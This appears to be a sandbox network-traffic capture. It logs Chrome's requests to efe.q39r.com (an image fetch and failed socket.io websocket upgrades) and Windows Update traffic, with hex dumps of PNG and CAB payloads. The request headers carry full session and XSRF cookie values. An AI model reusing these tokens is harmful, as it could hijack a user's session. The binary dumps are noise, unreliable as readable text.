                                                                                  2024-04-25 16:23:36 UTC1115OUTGET /ghZkYyc0mYIKciokhMyZ3rmnOyD3C9NSbJEMXI7KFs37Tbx9uncef210 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:36 UTC654INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:36 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 49602
                                                                                  Connection: close
                                                                                  Content-Disposition: inline; filename="ghZkYyc0mYIKciokhMyZ3rmnOyD3C9NSbJEMXI7KFs37Tbx9uncef210"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=41qc4J0bHsl7dvg%2FUl2eh3v%2BzuGu75ioqmdfroAGPVzU7SfrFlsHk74%2BvhHRn9sGVnM%2BrleGdIhLZ1W%2FCHgb1yE7582Sn2iCW7XMiXpV0B2wuWDpJfxvPU186a0E2w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fadb5ae6a5083-ATL
                                                                                  2024-04-25 16:23:36 UTC715INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 70 00 00 01 bb 08 06 00 00 00 a1 7b f0 cd 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 3b b6 00 00 3b b6 01 16 33 14 2b 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 77 77 77 2e 69 6e 6b 73 63 61 70 65 2e 6f 72 67 9b ee 3c 1a 00 00 20 00 49 44 41 54 78 9c ec dd 77 98 5d 55 bd ff f1 f7 4c 1a 49 28 21 04 42 ef bd 08 4a bb 0a 52 94 aa 02 16 50 44 e1 7a 2d a8 28 a0 82 a2 34 51 01 f1 2a 4d 51 2e 20 0a 28 fa 13 45 45 04 41 50 3a ea 05 04 0d 08 48 49 a4 05 09 10 20 09 e9 c9 ef 8f 75 72 33 09 93 72 ce 59 fb 7c f7 de e7 fd 7a 9e ef 33 93 32 c9 67 d6 de 7b f6 cc 59 df bd 56 0f ea 36 c3 81 75 80 b5 80 55 80 95 80 51 8d 5a 19 58 1e 18 01 0c 06 96 6d d4 a0 c6 c7 0d ee e7 df
                                                                                  Data Ascii: PNGIHDRp{sBIT|dpHYs;;3+tEXtSoftwarewww.inkscape.org< IDATxw]ULI(!BJRPDz-(4Q*MQ. (EEAP:HI ur3rY|z32g{YV6uUQZXm
                                                                                  2024-04-25 16:23:36 UTC1369INData Raw: 24 49 92 24 65 67 03 47 bc 81 c0 ee c0 81 c0 01 c0 e8 d8 38 b5 f5 08 69 02 fa 06 d2 8a 02 93 62 e3 a8 20 5b 00 7b 91 56 ae d9 15 18 16 1b a7 96 e6 90 56 e4 b8 12 f8 39 36 47 49 92 24 49 92 24 49 92 24 49 59 d8 c0 11 63 20 f0 16 52 d3 c6 bb 80 51 b1 71 ba ce 2c d2 f6 10 bf 05 ae 02 fe 19 1b 47 6d 18 0a ec 01 ec 0f bc 0d 58 3d 36 4e 57 ba 0b f8 05 a9 99 63 6c 70 16 49 92 24 49 92 24 49 92 24 49 5a 2a 9b 02 67 00 cf 02 73 ad d2 d4 63 c0 b9 a4 46 80 41 8b 3c 7a 2a 8b 51 c0 61 c0 15 c0 2b c4 9f 3f d6 fc ba 1b 38 1c 58 6e 91 47 4f 92 24 49 92 24 49 92 24 49 92 82 2c 4f 9a 6c be 81 b4 f5 40 f4 04 ab b5 f8 7a 1e b8 0c d8 8f b4 52 8a ca 61 24 e9 3a ba 1a 98 49 fc 79 62 2d be a6 92 1a 6c f6 c0 95 9e 24 49 92 24 49 92 24 49 92 24 05 db 88 b4 aa c3 24 e2 27 53 ad d6
                                                                                  Data Ascii: $I$egG8ib [{VV96GI$I$I$IYc RQq,GmX=6NWclpI$I$I$IZ*gscFA<z*Qa+?8XnGO$I$I$I,Ol@zRa$:Iyb-l$I$I$I$$'S
                                                                                  2024-04-25 16:23:36 UTC1369INData Raw: 9f 95 44 24 49 9d b3 1a f0 47 60 db e8 20 92 24 49 92 24 49 92 24 49 52 95 1b 1f 4e 03 8e 8f 0e 21 49 aa bc 97 80 3d 80 7b a2 83 48 92 24 49 92 24 49 92 24 a9 7b 55 75 05 8e af 60 f3 86 24 29 8f 11 c0 75 b8 9d 8a 24 49 92 24 49 92 24 49 92 02 55 71 05 8e 63 81 6f 46 87 90 24 d5 ce 04 60 77 e0 81 e8 20 92 24 49 92 24 49 92 24 49 ea 3e 55 6b e0 f8 2c 70 56 74 08 49 52 6d fd 9b d4 c4 f1 60 74 10 49 92 24 49 92 24 49 92 24 75 97 2a 35 70 1c 05 9c 1b 1d 42 92 54 7b 4f 03 bb 02 8f 45 07 91 24 49 92 24 49 92 24 49 52 f7 a8 4a 03 c7 11 c0 79 54 27 af 24 a9 da 9e 20 35 71 8c 0b ce 21 49 92 24 49 92 24 49 92 a4 2e 51 85 86 88 f7 00 57 00 bd d1 41 24 49 5d e5 31 e0 3f 80 e7 a3 83 48 92 24 49 92 24 49 92 24 a9 fe ca de c0 b1 23 70 13 30 34 3a 48 cd 4d 07 fe 45 7a e2
                                                                                  Data Ascii: D$IG` $I$I$IRN!I={H$I$I${Uu`$)u$I$I$IUqcoF$`w $I$I$I>Uk,pVtIRm`tI$I$I$u*5pBT{OE$I$I$IRJyT'$ 5q!I$I$I.QWA$I]1?H$I$I$#p04:HMEz
                                                                                  2024-04-25 16:23:36 UTC1369INData Raw: 77 8e c1 93 24 49 92 24 49 92 24 49 92 8a f6 51 e2 27 d7 3a 59 37 00 6b 67 19 39 95 c5 bc 46 8e 7f 10 7f 7e d5 a9 66 00 97 01 9b 2c fd a1 50 45 bc 03 78 86 f8 73 ac 53 35 1e 18 99 65 e4 24 49 92 24 49 92 24 49 92 a4 82 ac 01 4c 24 7e 72 ad 13 35 13 38 06 57 dd a8 b3 5e e0 60 60 0c f1 e7 5b 95 6b 2a f0 5d d2 d6 4a aa af 55 81 9b 89 3f df 3a 55 97 66 19 35 49 92 24 49 92 24 49 92 24 a9 20 57 13 3f a9 d6 89 7a 16 d8 2d cf 90 a9 02 7a 81 f7 00 0f 12 7f ee 55 a9 66 00 df 03 56 6f 7e c8 55 51 03 81 33 89 3f f7 3a 55 fb e6 19 36 49 92 24 49 92 24 49 92 24 29 af 43 89 9f 4c eb 44 dd 85 2b 09 74 a3 cd 81 a7 89 3f ff aa 50 73 80 2b 80 8d 5a 1a 69 d5 c1 01 c0 4b c4 9f 8b 45 d7 d3 c0 88 4c 63 26 49 92 24 49 92 24 49 92 24 65 b1 22 30 81 f8 c9 b4 a2 eb bb c0 e0 4c 63
                                                                                  Data Ascii: w$I$I$IQ':Y7kg9F~f,PExsS5e$I$I$IL$~r58W^``[k*]JU?:Uf5I$I$I$ W?z-zUfVo~UQ3?:U6I$I$I$)CLD+t?Ps+ZiKELc&I$I$I$e"0Lc
                                                                                  2024-04-25 16:23:36 UTC1369INData Raw: e5 72 3e f1 d7 56 8e da 36 f7 c0 48 92 24 49 92 24 49 92 24 a9 3b 8c 02 a6 12 3f e1 d5 6e 7d 25 f7 c0 a8 b4 06 00 57 11 7f ce 45 d5 c3 c0 46 6d 8f a2 54 3e cb 03 4f 10 7f 8d b5 5b 97 64 1e 17 49 92 24 49 92 24 49 92 24 75 89 e3 89 9f ec 6a b7 1e 02 96 c9 3d 30 2a ad ef 10 7f ce 45 d5 f5 c0 88 f6 87 50 2a ad b7 11 7f 9d b5 5b d3 80 d1 b9 07 46 92 24 49 92 24 49 92 24 49 f5 36 80 7a 3c ed bc 6b ee 81 51 69 7d 96 f8 f3 2d aa be 4d ba 66 a5 ba fb 25 f1 d7 5b bb f5 a5 ec a3 22 49 92 24 49 92 24 49 92 a4 5a db 8b f8 49 ae 76 eb ca ec a3 a2 b2 7a 3b 30 8b f8 73 ae d3 35 0b 38 2a c3 f8 49 55 b1 3e 69 15 8b e8 6b af 9d fa 67 f6 51 91 24 49 92 24 49 92 24 49 52 ad fd 88 f8 49 ae 76 6a 06 b0 51 f6 51 51 19 6d 0b 4c 26 fe 9c eb 74 bd 42 6a 5c 91 ba cd 59 c4 5f 7f ed
                                                                                  Data Ascii: r>V6H$I$I$;?n}%WEFmT>O[dI$I$I$uj=0*EP*[F$I$I$I6z<kQi}-Mf%["I$I$IZIvz;0s58*IU>ikgQ$I$I$IRIvjQQQmL&tBj\Y_
                                                                                  2024-04-25 16:23:36 UTC1369INData Raw: 84 6a 3f 20 d8 b7 1e 21 35 71 49 aa 89 0f 13 ff 85 a5 d5 fa 49 01 e3 a1 72 d8 99 d4 a0 13 7d 8e 75 a2 a6 e2 de 7e 52 ab d6 02 66 12 7f 1d b7 52 2f 02 83 f2 0f 89 54 2a 2b 02 47 50 ed d5 de ba a5 66 03 37 02 87 02 c3 fa 3b 98 92 d4 61 a7 12 ff b5 d1 aa 7e 3d 49 5a c9 e5 9d c0 b2 48 92 54 6f 57 11 7f ef cd 55 8f 66 1e 1b a9 3f fb 11 7f ae e7 ac 6d f2 0e 8f a4 48 bf 22 fe 8b 4a ab b5 53 01 e3 a1 78 ab 03 e3 89 3f bf 3a 51 53 80 3d f3 0c 9b d4 b5 ae 24 fe 5a 6e b5 76 2f 60 3c a4 32 d8 16 b8 18 78 95 f8 eb cc 6a be 5e 06 fe 07 d8 6a e1 03 2b 49 1d 74 0b f1 5f 0f ad 7a d5 34 e0 f7 c0 67 80 8d 90 24 a9 7e fe 4d fc fd 36 67 2d 97 77 78 a4 d7 38 8d f8 f3 3c 67 7d 28 eb e8 48 0a 33 14 98 4c fc 17 95 56 ea be 02 c6 43 f1 06 00 37 11 7f 7e 75 a2 26 e3 e4 ad 94 c3 5b
                                                                                  Data Ascii: j? !5qIIr}u~RfR/T*+GPf7;a~=IZHToWUf?mH"JSx?:QS=$Znv/`<2xj^j+It_z4g$~M6g-wx8<g}(H3LVC7~u&[
                                                                                  2024-04-25 16:23:36 UTC1369INData Raw: 5f 03 c7 f6 1d 4f 91 87 db a7 54 df 76 c0 17 a3 43 14 e8 29 60 3f 60 52 74 10 a9 cb bd 08 dc 19 1d a2 05 db 46 07 50 57 58 01 b8 80 f4 44 e8 6a c1 59 d4 dd 3e 0c dc 03 bc 21 3a 88 24 49 05 1b 04 7c 96 b4 65 dd 7b 82 b3 48 92 24 49 92 82 f5 d7 c0 f1 fa 8e a7 68 df 74 e0 0f d1 21 d4 96 e1 a4 7d cf 07 45 07 29 c8 44 d2 93 35 4f 45 07 91 04 54 b3 e9 6f 2d 60 95 e8 10 aa b5 9d 80 31 a4 6d be a4 32 d8 84 d4 70 77 54 74 10 49 92 3a 60 55 e0 17 c0 ff c3 ef fb 25 49 92 24 a9 6b f5 d7 c0 51 c5 a7 dc 6e 06 26 47 87 50 5b ce 24 ed 01 5b 47 d3 81 77 01 ff 88 0e 22 e9 ff 5c 13 1d a0 45 55 6c b2 54 f9 f5 90 56 c0 ba 99 d4 28 24 95 c9 10 e0 5c e0 c7 c0 b0 e0 2c 92 24 75 c2 fb 80 07 80 43 a2 83 48 92 24 49 92 3a af 2e 2b 70 b8 fa 46 b5 bd 9d fa 3e ed 3b 07 f8 4f e0 96 e8
                                                                                  Data Ascii: _OTvC)`?`RtFPWXDjY>!:$I|e{H$Iht!}E)D5OETo-`1m2pwTtI:`U%I$kQn&GP[$[Gw"\EUlTV($\,$uCH$I:.+pF>;O
                                                                                  2024-04-25 16:23:36 UTC1369INData Raw: e8 10 52 c9 f5 02 3f 02 b6 89 0e 22 49 52 87 0d 00 2e 23 6d 2b 26 49 92 24 49 dd 6e f5 02 3e 7e 74 3f bf 37 1c 38 72 09 ff d6 89 a4 2d 30 17 b6 ea bc 06 8e 35 9b 08 56 16 8f 44 07 d0 12 1d 4e 5a 81 a3 4e 2e 03 be 1f 1d 42 52 76 55 bb a7 8c 00 96 8d 0e a1 70 6f 25 2d 8d dd 13 1d 44 aa 80 e1 c0 55 f4 ff 03 95 24 49 75 36 af 89 e3 1d d1 41 24 49 92 24 a9 8b fc 17 b0 dc 22 fe ec 2d c0 56 8b fa c0 81 8d b7 ab e6 4e d4 01 55 7b 5a ba db ac 08 7c 2d 3a 44 66 8f 02 9f 8a 0e 21 a9 10 55 bc a7 ac 46 f5 1a 4f 94 cf 36 c0 2f e9 bf 43 57 52 ff d6 06 7e 4e fa 01 69 56 70 16 49 92 3a 69 20 f0 33 52 03 f0 9f 83 b3 48 92 24 49 52 94 cb 80 c7 fb f9 fd ad 81 8d fb fc fa 71 e0 9e 7e fe de 5d 4d fc 5f cb 93 9a 38 be dd cf 9f 1d b5 b8 0f 9c d7 c0 d1 ee 72 21 9d f6 3c 30 31 3a
                                                                                  Data Ascii: R?"IR.#m+&I$In>~t?78r-05VDNZN.BRvUpo%-DU$Iu6A$I$"-VNU{Z|-:Df!UFO6/CWR~NiVpI:i 3RH$IRq~]M_8r!<01:
                                                                                  2024-04-25 16:23:36 UTC1369INData Raw: af 92 26 0c 17 77 ae fd 18 97 c3 2f 9b bd 88 ff 1a d4 6c f9 a2 76 3d 0d 06 ee 22 fe fc aa 7a dd 0a 7c 90 fa 3f e5 3b 08 38 80 d4 cd 3d 93 f8 71 af 7a cd db 97 52 52 f9 8d 25 fe 6b 46 11 75 4c ce 41 aa b8 95 48 ab 4f 1d 05 fc 84 d4 10 1f 7d 7c ea 5e 13 80 d5 97 7c 68 24 49 15 34 84 f8 fb 4c ee 5a 2f eb 08 49 af 75 19 f1 e7 79 ce 3a 36 ef f0 48 b5 72 16 0b 5e 2f ff d3 c4 c7 f6 7d 4d b6 bf 45 28 fe b4 d0 bf 7d 57 3f 7f e7 e5 be 7f a7 97 ea 2d c1 3e 31 3a 80 16 70 06 d0 1b 1d 22 93 df 90 9e ce 95 5a b5 07 a9 c9 ec 24 96 3c 61 f8 01 e0 16 60 95 a2 43 69 a9 55 f1 fe 52 b5 55 b4 b4 74 be 0a 6c 17 1d a2 a2 26 01 e7 02 9b 03 bb 90 9a e5 ea be 4a cd 4c e0 2a 60 7f d2 53 cb 5f 04 1e 09 4d 54 6d 5f 25 4d 18 4a 92 e2 bd 00 dc 0c 7c 9b b4 ad dc ba a4 e6 82 0f 00 97 52
                                                                                  Data Ascii: &w/lv="z|?;8=qzRR%kFuLAHO}|^|h$I4LZ/Iuy:6Hr^/}ME(}W?->1:p"Z$<a`CiURUtl&JL*`S_MTm_%MJ|R
                                                                                  2024-04-25 16:23:36 UTC1369INData Raw: 02 a4 25 e9 a1 3e ab 6f 7c 9d b4 6c aa b4 b0 bd 48 13 58 5f 06 86 04 65 58 1f 57 e1 88 54 b5 c9 e2 aa 35 61 6a 41 67 e1 b6 49 0b bb 11 d8 06 b8 3d 3a 48 97 9a 0c 1c 0c 7c 0e 98 19 9c a5 4c 36 07 f6 8b 0e 21 49 2a cc 44 e0 e3 c0 bb 80 e7 83 b3 94 d9 37 88 fb 39 59 92 24 49 92 ba 46 15 b7 50 71 ff f3 18 07 90 f6 a0 af ba 47 81 6f 46 87 50 e9 8c 06 2e 07 ae 07 36 08 ce 02 ae c2 11 a9 6a f7 98 aa dd c3 35 df 3e c0 be d1 21 4a e6 3b a4 31 79 31 3a 88 38 9b b4 7d cd 0b d1 41 4a e4 84 e8 00 92 a4 c2 fd 9a d4 48 7a 73 70 8e b2 5a 1f 38 2a 3a 84 24 49 92 24 d5 9d 0d 1c 5a 1a 3d c0 49 d1 21 32 39 0a 98 16 1d 42 a5 d1 03 1c 0e 3c 08 1c 12 9c a5 af 0d 80 0f 46 87 e8 52 55 5b 81 a3 6a f7 70 25 3d c0 d7 a2 43 94 c8 2c d2 53 af 47 e1 56 79 65 72 1b f0 66 e0 5f d1 41 4a
                                                                                  Data Ascii: %>o|lHX_eXWT5ajAgI=:H|L6!I*D79Y$IFPqGoFP.6j5>!J;1y1:8}AJHzspZ8*:$I$Z=I!29B<FRU[jp%=C,SGVyerf_AJ


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  67192.168.2.1749783172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:40 UTC1277OUTGET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: Upgrade
                                                                                  Pragma: no-cache
                                                                                  Cache-Control: no-cache
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Upgrade: websocket
                                                                                  Origin: https://efe.q39r.com
                                                                                  Sec-WebSocket-Version: 13
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
                                                                                  Sec-WebSocket-Key: bcs4vSyRabcBE/1HxukJOA==
                                                                                  Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                  2024-04-25 16:23:41 UTC567INHTTP/1.1 400 Bad Request
                                                                                  Date: Thu, 25 Apr 2024 16:23:41 GMT
                                                                                  Content-Type: application/json
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WGEvXZWuZptNSuYvsPJgMkGMjuxdhosFjQo7Wj1GGnCQwEET4G1KpirFmcmtoB3WPrsfEKyCQVzqFiqHBW48isX3ZhJd9ctrxHl%2Ft3042pEOr3ncLVspOQPCDmtObx8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fadcfdcab53b8-ATL
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2024-04-25 16:23:41 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                                                  Data Ascii: 22{"code":3,"message":"Bad request"}
                                                                                  2024-04-25 16:23:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  68192.168.2.174978452.165.165.26443
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:44 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=9KOl2MdB5OHyWcF&MD=cOMbbLl7 HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Accept: */*
                                                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                  Host: slscr.update.microsoft.com
                                                                                  2024-04-25 16:23:44 UTC560INHTTP/1.1 200 OK
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  Content-Type: application/octet-stream
                                                                                  Expires: -1
                                                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                  ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                                  MS-CorrelationId: f0648106-db7b-48ca-a618-f54b89daf54d
                                                                                  MS-RequestId: dec0a3eb-9bac-423b-87c5-533e235f90ae
                                                                                  MS-CV: UtQXJ7wm5UaZIGi7.0
                                                                                  X-Microsoft-SLSClientCache: 2160
                                                                                  Content-Disposition: attachment; filename=environment.cab
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Date: Thu, 25 Apr 2024 16:23:44 GMT
                                                                                  Connection: close
                                                                                  Content-Length: 25457
                                                                                  2024-04-25 16:23:44 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                                                  Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                                                  2024-04-25 16:23:44 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                                                  Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  69192.168.2.1749785172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:46 UTC1277OUTGET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: Upgrade
                                                                                  Pragma: no-cache
                                                                                  Cache-Control: no-cache
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Upgrade: websocket
                                                                                  Origin: https://efe.q39r.com
                                                                                  Sec-WebSocket-Version: 13
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
                                                                                  Sec-WebSocket-Key: g9kI22xxf0cCPk9QAAfzSA==
                                                                                  Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                  2024-04-25 16:23:47 UTC575INHTTP/1.1 400 Bad Request
                                                                                  Date: Thu, 25 Apr 2024 16:23:47 GMT
                                                                                  Content-Type: application/json
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eFya2qS%2FXFVyliDw81sBIsx5riEw7YWdoKdVc4Fw9nKkBP21afkVt7k5G6xrjIfnWxYgwlcR7g%2B%2BNj0ugZmTxhD9Zou5K3gZBSceg0i4fjcE%2FV64rm%2BHMe8u0JcRmco%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fadf5eb2706f8-ATL
                                                                                  alt-svc: h3=":443"; ma=86400
